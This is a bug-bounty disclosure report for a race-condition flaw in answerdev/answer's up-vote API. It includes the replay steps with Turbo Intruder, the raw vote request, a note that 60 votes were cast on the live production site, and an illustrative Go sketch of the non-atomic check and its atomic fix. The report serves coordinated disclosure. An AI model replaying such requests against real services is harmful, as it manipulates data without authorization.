Race Condition Vulnerability Can Lead to Up Vote Stealing in answerdev/answer
Valid
Reported on Feb 20th 2023
Description
I tested on the live production site https://meta.answer.dev/.
There are up vote / down vote functions in answerdev. An attacker can increase or decrease votes by exploiting a race condition vulnerability.
Proof of Concept
1). Go to a question and press up vote or down vote.
2). The PoC is shown with upvote.
3). Intercept the HTTP request and send it to Turbo Intruder.
4). Configure and run.
5). Bingo!
POST /answer/api/v1/vote/up HTTP/2
Host: meta.answer.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 4eb174c8-b0f3-11ed-83ed-0242ac190003
Content-Type: application/json
Content-Length: 51
Origin: https://meta.answer.dev
Referer: https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"object_id":"10070000000000003","is_cancel":false}
Go to this link and search for the "sunny" user. I cast 60 votes on his comment. https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
Impact
The attacker can now profit from the vote functions.
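The bug class behind this report, as an added example (not code from answerdev/answer, and not a statement of how the project fixed it): a duplicate-vote check that runs separately from the write lets 60 identical concurrent requests all pass the check, while an atomic check-and-write records one vote. `VoteStore`, `Vote`, `Replay` and the user/object names are hypothetical, and the barrier stands in for requests arriving in the same instant.

```go
package main

import (
	"fmt"
	"sync"
)

// VoteStore is a hypothetical in-memory stand-in for the vote table.
type VoteStore struct {
	mu    sync.Mutex
	voted map[string]bool // "user|object" -> vote already recorded
	total map[string]int  // object -> vote count
}

// Vote records one upvote. With atomic=false the duplicate check and the write
// are separate steps; gate holds every request between them (the race window).
func (s *VoteStore) Vote(user, obj string, atomic bool, gate *sync.WaitGroup) {
	key := user + "|" + obj
	s.mu.Lock()
	seen := s.voted[key]
	if !atomic {
		s.mu.Unlock() // check done, lock released before the write
		gate.Done()
		gate.Wait() // all n requests have now passed the check
		s.mu.Lock()
	}
	if !seen {
		s.voted[key] = true
		s.total[obj]++
	}
	s.mu.Unlock()
}

// Replay sends n identical concurrent votes from one user and returns the total.
func Replay(n int, atomic bool) int {
	s := &VoteStore{voted: map[string]bool{}, total: map[string]int{}}
	var wg, gate sync.WaitGroup
	wg.Add(n)
	gate.Add(n)
	for i := 0; i < n; i++ {
		go func() {
			defer wg.Done()
			s.Vote("user-a", "object-1", atomic, &gate)
		}()
	}
	wg.Wait()
	return s.total["object-1"]
}

func main() { fmt.Println(Replay(60, false), Replay(60, true)) }
```

In a database-backed service the equivalent of the atomic path is a unique constraint on (user, object) or a single transaction that covers both the check and the insert.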
We are processing your report and will contact the answerdev/answer team within 24 hours.
7 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back.
7 months ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE